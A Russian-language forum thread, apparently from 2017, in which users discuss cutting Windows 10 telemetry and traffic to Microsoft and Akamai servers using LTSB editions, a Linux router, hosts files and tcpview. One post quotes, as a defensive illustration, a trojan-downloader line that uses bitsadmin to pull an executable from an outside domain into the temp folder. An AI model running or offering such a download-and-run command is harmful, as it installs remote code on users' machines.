Windows 10 и Akamai

Тема в разделе "WASM.HEAP", создана пользователем Fail, 19 мар 2017.

  1. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
    Всем привет:) Прошу не кидать тапками по поводу целесообразности юзания этой оси:)

    Итак, вопрос... В винде штатными стредствами выключен весь функционал телеметрии\отчетов и прочего, нештатными выпилено все что можно было выпилить\выключить. И воджеж незадача - в любом приложении, которое юзает сеть, ловятся пакеты к сервакам микрософт( Тоесть как я понимаю, ос инжектит эту пакость в сами процессы.

    Кто сталкивался с тотальным искоренением сий пакости?
     
  2. UbIvItS

    UbIvItS Well-Known Member

    Публикаций:
    0
    Регистрация:
    5 янв 2007
    Сообщения:
    6.087
    боюсь, не получится (при прямом подрубе к инету) ==>> нужно просеивать ядро и всю сетевую оснастку.

    1. попробуй лтсб вынь 10 иль сервачную версию (конечно, полного обруба трои ожидать не стоит, но явно будет легче).
    2. обеспечь связь с инетом чрез умный роутер, то бишь комп с линем, тч сможешь резать всю гадость.
     
    Fail нравится это.
  3. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
    О, блин, я совсем забыл как то о лтсб редакции..) А умный роутер - я тоже подумал об этом. но только в качестве тяжелой артиллерии:)

    Ясно.. Значит это все глубоко в ядре сидит(((
     
  4. _edge

    _edge Well-Known Member

    Публикаций:
    1
    Регистрация:
    29 окт 2004
    Сообщения:
    631
    Адрес:
    Russia
    У меня на 2-м разделе установлена Windows_10_Enterprise_LTSB_x86_x64_RU_Lite_v.6_by_naifle (Ltsb и еще порезанная).
    "Взвешивая" ее 64бит версию против других Бесяток, получалась меньше на 10к файлов в установленном виде.

    Я практически с ней не работал, стоит как резервная. Поэтому, по теме, что она отсылает в Сеть, сказать ничего не могу.
     
    Последнее редактирование: 20 мар 2017
  5. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
    Вот, да.. Ну 10к файлов троянского кода - тоже не плохо)) Короче продолжаю параноить и уже скачал лтсб:))

    А вы попробуйте чисто взглянуть на 10 мин - просто огнелис установите и зайдите на любой сайт, и посмотрите, с чем там устанавливаются соединения)

    И еще... порезанные версии, лайтовые которые, обычно страдают невозможностью добавлением пользователей, что совсем не тру, ибо сидеть под одмином нехорошо:)
     
  6. UbIvItS

    UbIvItS Well-Known Member

    Публикаций:
    0
    Регистрация:
    5 янв 2007
    Сообщения:
    6.087
    Fail, сложно судить были ли то именно 10 килов трои :))) с учётом дубляжа функций, трои может быть много метров. к тому же, всегда имеется много кода двойного применения и агульно выпилить его не удастся :)))
     
  7. _edge

    _edge Well-Known Member

    Публикаций:
    1
    Регистрация:
    29 окт 2004
    Сообщения:
    631
    Адрес:
    Russia
    Смотреть внизу в FF в плашке "соединение с ..", или что-то из сетевых экранов ставить - и смотреть уже в них?
    Если "соединение с ..", это режется mvps hosts (127.0.0.0. для различных googleadworks), ну и россыпью из баннерорезок, тут каждому на свой вкус.

    А вообще Акамаи, имхо, не зарежешь, через него нагрузку распределяют, для всего, не только обновлений/телеметрии. И не только Микрософт.

    Можно погуглить "akamai technologies левый трафик" - популярный запрос.
     
  8. _edge

    _edge Well-Known Member

    Публикаций:
    1
    Регистрация:
    29 окт 2004
    Сообщения:
    631
    Адрес:
    Russia
    https://www.opennet.ru/openforum/vsluhforumID10/5387.html

    index.jpg

    Еще пишут, что к Акамаи присоединяется BITS - служба. Я бы вообще рекомендовал ее запретить, наряду с wscript/cscript, а cmd.exe - переименовать, потому что через нее работают троянские загрузчики.
    Код (Text):
    1. cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False)
    Да, теперь можно не спать ночью и думать о скрытом пользователе с именем из трех ромбиков :S
     
  9. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
    В tcpview удобнее всего..
     
    _edge нравится это.
  10. njeen

    njeen Active Member

    Публикаций:
    0
    Регистрация:
    26 мар 2017
    Сообщения:
    138
    Адрес:
    Ташлинск
    Службы магазина (WSService) и BITS тоже отключены?